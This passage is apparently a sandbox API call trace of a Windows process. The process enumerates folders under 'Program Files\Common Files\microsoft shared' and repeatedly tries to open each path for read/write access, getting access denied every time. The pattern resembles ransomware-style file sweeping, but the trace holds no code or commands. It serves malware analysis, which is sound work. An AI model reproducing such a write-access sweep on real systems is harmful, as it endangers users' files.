| out: lpWideCharStr=0x0) returned 68 [0087.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82328 [0087.531] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x82328, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg") returned 68 [0087.531] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.531] GetLastError () returned 0x5 [0087.531] GetLastError () returned 0x5 [0087.531] SetLastError (dwErrCode=0x5) [0087.531] GetLastError () returned 0x5 [0087.532] SetLastError (dwErrCode=0x5) [0087.532] GetLastError () returned 0x5 [0087.532] SetLastError (dwErrCode=0x5) [0087.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82328 | out: hHeap=0x20000) returned 1 [0087.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0087.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0087.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0087.532] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.532] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.532] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x86, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x8a2d8, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x86, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓ᵑ")) returned 0 [0087.532] FindClose (in: hFindFile=0x784d0 | out: hFindFile=0x784d0) returned 1 [0087.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0087.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0087.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0087.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0087.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e2d8 | out: hHeap=0x20000) returned 1 [0087.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0087.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0087.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46a58 | out: hHeap=0x20000) returned 1 [0087.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0087.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0087.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0087.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0087.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0087.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0087.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0087.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a2d0 [0087.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0087.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0087.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0087.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0087.533] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.533] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.533] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.533] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0087.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0087.533] AreFileApisANSI () returned 1 [0087.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\TextConv", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\TextConv", lpUsedDefaultChar=0x0) returned 56 [0087.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0087.533] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.533] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0087.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0087.533] AreFileApisANSI () returned 1 [0087.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0087.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0087.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x75be8, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\TextConv") returned 56 [0087.534] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\TextConv" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.534] GetLastError () returned 0x5 [0087.534] GetLastError () returned 0x5 [0087.534] SetLastError (dwErrCode=0x5) [0087.534] GetLastError () returned 0x5 [0087.534] SetLastError (dwErrCode=0x5) [0087.534] GetLastError () returned 0x5 [0087.534] SetLastError (dwErrCode=0x5) [0087.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0087.534] AreFileApisANSI () returned 1 [0087.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0087.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0087.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x75e40, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\TextConv") returned 56 [0087.534] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\TextConv" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.534] GetLastError () returned 0x5 [0087.534] GetLastError () returned 0x5 [0087.534] SetLastError (dwErrCode=0x5) [0087.534] GetLastError () returned 0x5 [0087.534] SetLastError (dwErrCode=0x5) [0087.534] GetLastError () returned 0x5 [0087.534] SetLastError (dwErrCode=0x5) [0087.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0087.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0087.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0087.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0087.535] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.535] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.535] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.535] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0087.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0087.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a400 [0087.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0087.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0087.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0087.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0087.535] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0b57d42, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Triedit", cAlternateFileName="")) returned 1 [0087.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0087.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0087.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0087.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fdc8 [0087.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0087.535] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x780d0 [0087.535] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0b56882, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0087.535] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0b5787e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0087.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fdc8 | out: hHeap=0x20000) returned 1 [0087.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0087.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45e18 [0087.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0087.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0087.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0087.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0087.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0087.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0087.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0087.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0087.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0087.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0087.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fdc8 [0087.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0087.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0087.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fdc8 | out: hHeap=0x20000) returned 1 [0087.536] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.536] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.536] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.536] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0087.536] AreFileApisANSI () returned 1 [0087.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US", lpUsedDefaultChar=0x0) returned 62 [0087.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0087.536] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.536] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0087.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0087.536] AreFileApisANSI () returned 1 [0087.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0087.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6ebe0 [0087.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x6ebe0, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US") returned 62 [0087.536] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\en-us"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.537] GetLastError () returned 0x5 [0087.537] GetLastError () returned 0x5 [0087.537] SetLastError (dwErrCode=0x5) [0087.537] GetLastError () returned 0x5 [0087.537] SetLastError (dwErrCode=0x5) [0087.537] GetLastError () returned 0x5 [0087.537] SetLastError (dwErrCode=0x5) [0087.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0087.537] AreFileApisANSI () returned 1 [0087.537] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0087.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6eb58 [0087.537] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x6eb58, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US") returned 62 [0087.537] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\en-us"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.537] GetLastError () returned 0x5 [0087.537] GetLastError () returned 0x5 [0087.537] SetLastError (dwErrCode=0x5) [0087.537] GetLastError () returned 0x5 [0087.537] SetLastError (dwErrCode=0x5) [0087.537] GetLastError () returned 0x5 [0087.537] SetLastError (dwErrCode=0x5) [0087.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0087.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0087.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0087.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0087.537] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.538] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.538] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.538] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0087.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f9a8 [0087.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0087.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0087.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f9a8 | out: hHeap=0x20000) returned 1 [0087.538] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x7a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x82de0, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x7a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="")) returned 0 [0087.538] FindClose (in: hFindFile=0x780d0 | out: hFindFile=0x780d0) returned 1 [0087.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0087.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0087.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0087.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0087.538] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78510 [0087.538] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0b5787e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0087.538] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0b5787e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0087.538] FindClose (in: hFindFile=0x78510 | out: hFindFile=0x78510) returned 1 [0087.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0087.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0087.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45fd8 [0087.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0087.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0087.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0087.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0087.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0087.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0087.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0087.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45fd8 | out: hHeap=0x20000) returned 1 [0087.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0087.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0087.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0087.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0087.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0087.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0087.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0087.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 